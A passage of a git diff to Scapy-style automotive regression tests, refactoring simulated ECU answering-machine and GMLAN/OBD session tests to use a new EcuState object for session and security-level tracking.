len(ecu.log["TransferData"]) == 2 # no_docs +response = ecu.supported_responses[0] +assert response.supports_state(EcuState()) +assert response.key_response.service == 80 +assert response.key_response.diagnosticSessionType == 3 +response = ecu.supported_responses[1] +assert response.supports_state(EcuState(session=3)) +assert response.key_response.service == 80 +assert response.key_response.diagnosticSessionType == 2 +response = ecu.supported_responses[4] +print(response) +state = EcuState(session=2, security_level=18) +print(state) +assert response.supports_state(state) +assert response.key_response.service == 110 +assert response.key_response.dataIdentifier == 61786 +assert len(ecu.log["TransferData"]) == 2 = Analyze on the fly with EcuSession GMLAN1 @@ -474,26 +546,28 @@ with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: ecu = session.ecu print("Check 1 after change to diagnostic mode") assert len(ecu.supported_responses) == 1 - assert ecu.current_session == 3 - assert ecu.current_security_level == 0 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=8, opened_socket=sock, timeout=3) + assert ecu.state == EcuState(session=3) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=8, opened_socket=sock) ecu = session.ecu - print("Check 2 after some more messages were read") - assert len(ecu.supported_responses) == 4 - assert ecu.current_session == 3 - assert ecu.current_security_level == 0 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=10, opened_socket=sock, timeout=3) + print("Check 2 after some more messages were read1") + assert len(ecu.supported_responses) == 3 + print("Check 2 after some more messages were read2") + assert ecu.state.session == 3 + print("assert 1") + assert ecu.state.communication_control == 1 + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=10, opened_socket=sock) ecu = session.ecu print("Check 3 after change to programming mode (bootloader)") - assert len(ecu.supported_responses) == 5 - assert ecu.current_session == 2 - assert ecu.current_security_level == 0 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=16, opened_socket=sock, timeout=3) + assert len(ecu.supported_responses) == 4 + assert ecu.state.session == 2 + assert ecu.state.communication_control == 1 + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=16, opened_socket=sock) ecu = session.ecu print("Check 4 after gaining security access") - assert len(ecu.supported_responses) == 7 - assert ecu.current_session == 2 - assert ecu.current_security_level == 2 + assert len(ecu.supported_responses) == 6 + assert ecu.state.session == 2 + assert ecu.state.security_level == 2 + assert ecu.state.communication_control == 1 = Analyze on the fly with EcuSession GMLAN logging test diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index 651c9cb2e06..c8fa94630e6 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -1,5 +1,4 @@ % Regression tests for EcuAnsweringMachine -~ needs_root + Configuration ~ conf @@ -31,7 +30,7 @@ conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 drain_bus(iface0) example_responses = \ - [EcuResponse(session=1, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=0x1234) / Raw(b"deadbeef"))] + [EcuResponse([EcuState(session=1)], responses=UDS() / UDS_RDBIPR(dataIdentifier=0x1234) / Raw(b"deadbeef"))] success = False @@ -65,10 +64,10 @@ assert success drain_bus(iface0) example_responses = \ - [EcuResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), - EcuResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), - EcuResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), - EcuResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4"))] + [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), + EcuResponse(EcuState(session=[3, 4]), responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), + EcuResponse(EcuState(session=[5, 6, 7]), responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), + EcuResponse(EcuState(session=[8, 9]), responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4"))] success = False @@ -82,22 +81,22 @@ with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x700, did=0x600, ba resp = tester.sr1(UDS()/UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) assert resp.negativeResponseCode == 0x10 assert resp.requestServiceId == 34 - answering_machine.ecu_state.current_session = 2 + answering_machine.state.session = 2 resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) assert resp.service == 0x62 assert resp.dataIdentifier == 2 assert resp.load == b"deadbeef1" - answering_machine.ecu_state.current_session = 4 + answering_machine.state.session = 4 resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) assert resp.service == 0x62 assert resp.dataIdentifier == 3 assert resp.load == b"deadbeef2" - answering_machine.ecu_state.current_session = 6 + answering_machine.state.session = 6 resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) assert resp.service == 0x62 assert resp.dataIdentifier == 5 assert resp.load == b"deadbeef3" - answering_machine.ecu_state.current_session = 9 + answering_machine.state.session = 9 resp = tester.sr1(UDS() / UDS_RDBI(identifiers=[2, 3, 5, 9]), timeout=1, verbose=False) assert resp.service == 0x62 assert resp.dataIdentifier == 9 @@ -115,21 +114,21 @@ assert success drain_bus(iface0) example_responses = \ - [EcuResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), - EcuResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), - EcuResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), - EcuResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), - EcuResponse(session=range(0,8), security_level=lambda x: x==0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=2, sessionParameterRecord=b"dead")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b"dead")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=4, sessionParameterRecord=b"dead")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=5, sessionParameterRecord=b"dead")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=6, sessionParameterRecord=b"dead")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=7, sessionParameterRecord=b"dead")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=8, sessionParameterRecord=b"dead")), - EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), - EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), + EcuResponse(EcuState(session=range(3,5)), responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), + EcuResponse(EcuState(session=[5,6,7]), responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), + EcuResponse(EcuState(session=9), responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=2, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=4, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=5, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=6, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=7, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(0,8))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=8, sessionParameterRecord=b"dead")), + EcuResponse([EcuState(), EcuState(session=range(8,10))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), + EcuResponse([EcuState(), EcuState(session=range(8,10))], responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False @@ -201,14 +200,14 @@ def custom_answers(resp, req): return False example_responses = \ - [EcuResponse(session=2, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), - EcuResponse(session=range(3,5), security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), - EcuResponse(session=[5,6,7], security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), - EcuResponse(session=lambda x: 8 < x <= 10, security_level=0, responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), - EcuResponse(session=range(0,8), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead"), answers=custom_answers), - EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), - EcuResponse(session=range(8,10), security_level=0, responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"deadbeef1")), + EcuResponse(EcuState(session=range(3,5)), responses=UDS() / UDS_RDBIPR(dataIdentifier=3) / Raw(b"deadbeef2")), + EcuResponse(EcuState(session=[5,6,7]), responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef3")), + EcuResponse(EcuState(session=[9, 10]), responses=UDS() / UDS_RDBIPR(dataIdentifier=9) / Raw(b"deadbeef4")), + EcuResponse(EcuState(session=range(0,8)), responses=UDS() / UDS_DSCPR(diagnosticSessionType=1, sessionParameterRecord=b"dead"), answers=custom_answers), + EcuResponse(EcuState(session=range(8,10)), responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead1")), + EcuResponse(EcuState(session=range(8,10)), responses=UDS() / UDS_DSCPR(diagnosticSessionType=9, sessionParameterRecord=b"dead2")), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False @@ -285,10 +284,10 @@ def custom_answers(resp, req): return False example_responses = \ - [EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234"), answers=custom_answers), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234"), answers=custom_answers), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False @@ -337,10 +336,10 @@ def custom_answers(resp, req): return False example_responses = \ - [EcuResponse(session=range(0,255), security_level=0, responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(EcuState(session=range(0,255)), responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] success = False @@ -389,10 +388,10 @@ def custom_answers(resp, req): return False example_responses = \ - [EcuResponse(session=range(0,255), security_level=0, responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), - EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] + [EcuResponse(EcuState(session=range(0,255)), responses=[UDS()/UDS_NR(negativeResponseCode=0x78, requestServiceId=0x27), UDS() / UDS_SAPR(securityAccessType=1, securitySeed=b"1234")], answers=custom_answers), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_SAPR(securityAccessType=2), answers=custom_answers), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x35, requestServiceId=0x27)), + EcuResponse(EcuState(session=range(0,255)), responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10))] conf.contribs['UDS']['treat-response-pending-as-answer'] = True diff --git a/test/contrib/automotive/gm/gmlan.uts b/test/contrib/automotive/gm/gmlan.uts index 748188e049c..6aa503b8c7e 100644 --- a/test/contrib/automotive/gm/gmlan.uts +++ b/test/contrib/automotive/gm/gmlan.uts @@ -11,6 +11,9 @@ load_contrib("automotive.ecu", globals_dict=globals()) load_contrib("automotive.gm.gmlan", globals_dict=globals()) +from scapy.contrib.automotive.gm.gmlan_ecu_states import * + + + Basic Packet Tests() = Set GMLAN ECU AddressingScheme @@ -243,8 +246,9 @@ x.subfunction == 2 x.answers(b) ecu = Ecu() +ecu.update(b) ecu.update(x) -assert ecu.current_security_level == 2 +assert ecu.state.security_level == 2 = Craft Packet for GMLAN_SAPR2 @@ -437,17 +441,21 @@ y.hashret() == x.hashret() = Check modifies ecu state ecu = Ecu() +ecu.update(GMLAN(service="InitiateDiagnosticOperation")) ecu.update(GMLAN(service="InitiateDiagnosticOperationPositiveResponse")) -assert ecu.current_session == 3 +assert ecu.state.session == 3 +ecu.update(GMLAN(service="ReturnToNormalOperation")) ecu.update(GMLAN(service="ReturnToNormalOperationPositiveResponse")) -assert ecu.current_session == 1 +assert ecu.state.session == 1 +ecu.update(GMLAN(service="ProgrammingMode")) ecu.update(GMLAN(service="ProgrammingModePositiveResponse")) -assert ecu.current_session == 2 +assert ecu.state.session == 2 +ecu.update(GMLAN(service="DisableNormalCommunication")) ecu.update(GMLAN(service="DisableNormalCommunicationPositiveResponse")) -assert ecu.communication_control == 1 +assert ecu.state.communication_control == 1 +ecu.update(GMLAN(service="ReturnToNormalOperation")) ecu.update(GMLAN(service="ReturnToNormalOperationPositiveResponse")) -assert ecu.current_session == 1 -assert ecu.communication_control == 0 +assert ecu.state.session == 1 = Craft GMLAN_DC diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index eddc01ea97f..fc810522edd 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -33,71 +33,95 @@ conf.contribs['EcuAnsweringMachine']['send_delay'] = 0.004 = Create answers +s3 = OBD()/OBD_S03_PR(dtcs=[OBD_DTC()]) + +s1_pid00 = OBD() / OBD_S01_PR(data_records=[OBD_S01_PR_Record() / OBD_PID00(supported_pids="PID03+PID0B+PID0F")]) +s6_mid00 = OBD() / OBD_S06_PR(data_records=[OBD_S06_PR_Record() / OBD_MID00(supported_mids="")]) +s8_tid00 = OBD() / OBD_S08_PR(data_records=[OBD_S08_PR_Record() / OBD_TID00(supported_tids="")]) +s9_iid00 = OBD() / OBD_S09_PR(data_records=[OBD_S09_PR_Record() / OBD_IID00(supported_iids="")]) + + +s1_pid01 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID01()]) +s1_pid03 = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID03(fuel_system1=0, fuel_system2=2)]) +s1_pid0B = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0B(data=100)]) +s1_pid0F = OBD()/OBD_S01_PR(data_records=[OBD_S01_PR_Record()/OBD_PID0F(data=50)]) + +example_responses = \ + [EcuResponse(responses=s3), + EcuResponse(responses=s1_pid00), + EcuResponse(responses=s6_mid00), + EcuResponse(responses=s8_tid00), + EcuResponse(responses=s9_iid00), + EcuResponse(responses=s1_pid01), + EcuResponse(responses=s1_pid03), + EcuResponse(responses=s1_pid0B), + EcuResponse(responses=s1_pid0F)] + responses = [ - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=0)/OBD_PID00(supported_pids=3191777299)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=1)/OBD_PID01(mil=0, dtc_count=0, reserved1=0, continuous_tests_ready=0, reserved2=0, continuous_tests_supported=7, once_per_trip_tests_supported=225, once_per_trip_tests_ready=0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=11)/OBD_PID0B(data=44)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=12)/OBD_PID0C(data=857.0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=13)/OBD_PID0D(data=0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=14)/OBD_PID0E(data=3.5)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=15)/OBD_PID0F(data=22.0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=17)/OBD_PID11(data=14.51)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=19)/OBD_PID13(sensors_present=3)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=21)/OBD_PID15(outputVoltage=1.275, trim=99.219)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=28)/OBD_PID1C(data=6)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=3)/OBD_PID03(fuel_system1=2, fuel_system2=0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=31)/OBD_PID1F(data=13)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=32)/OBD_PID20(supported_pids=2684465153)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=33)/OBD_PID21(data=0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=35)/OBD_PID23(data=24910)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=4)/OBD_PID04(data=9.804)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=48)/OBD_PID30(data=19)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=49)/OBD_PID31(data=3587)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=5)/OBD_PID05(data=41.0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=51)/OBD_PID33(data=97)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=52)/OBD_PID34(equivalence_ratio=1.001, current=128.004)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=6)/OBD_PID06(data=0.0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=64)/OBD_PID40(supported_pids=244352000)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=69)/OBD_PID45(data=3.922)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=7)/OBD_PID07(data=-0.781)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=70)/OBD_PID46(data=20.0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=71)/OBD_PID47(data=12.549)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=73)/OBD_PID49(data=5.49)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=76)/OBD_PID4C(data=3.922)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=81)/OBD_PID51(data=1)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=65)/OBD_S01_PR(data_records=[OBD_S01_PR_Record(pid=86)/OBD_PID56(bank1=0.0)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=67)/OBD_S03_PR(count=0)), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=0)/OBD_MID00(supported_mids=3221225473)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=131, unit_and_scaling_id=4, test_value=0.0, min_limit=0.0, max_limit=1.0),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=138, unit_and_scaling_id=132, test_value=0.996, min_limit=-32.768, max_limit=1.06),OBD_S06_PR_Record(mid=1)/OBD_MIDXX(standardized_test_id=139, unit_and_scaling_id=132, test_value=0.996, min_limit=0.94, max_limit=32.767)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=128)/OBD_MID80(supported_mids=1)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=160)/OBD_MIDA0(supported_mids=4160749568)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=161)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=162)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=2, min_limit=0, max_limit=65535)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=163)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=164)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=12, unit_and_scaling_id=36, test_value=0, min_limit=0, max_limit=65535),OBD_S06_PR_Record(mid=165)/OBD_MIDXX(standardized_test_id=11, unit_and_scaling_id=36, test_value=1, min_limit=0, max_limit=65535)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=145, unit_and_scaling_id=177, test_value=3944, min_limit=900, max_limit=65534),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=149, unit_and_scaling_id=10, test_value=764.696, min_limit=719.556, max_limit=7995.27),OBD_S06_PR_Record(mid=2)/OBD_MIDXX(standardized_test_id=150, unit_and_scaling_id=10, test_value=115.412, min_limit=0.0, max_limit=179.95)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=32)/OBD_MID20(supported_mids=2147485697)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=33)/OBD_MIDXX(standardized_test_id=132, unit_and_scaling_id=3, test_value=2.63, min_limit=1.0, max_limit=655.35)])), - EcuResponse(session=range(0, 255), security_level=0, responses=OBD(service=70)/OBD_S06_PR(data_records=[OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=128, unit_and_scaling_id=28, test_value=32.42, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=129, unit_and_scaling_id=28, test_value=25.41, min_limit=10.0, max_limit=655.35),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=130, unit_and_scaling_id=28, test_value=0.21, min_limit=0.0, max_limit=10.0),OBD_S06_PR_Record(mid=53)/OBD_MIDXX(standardized_test_id=131, 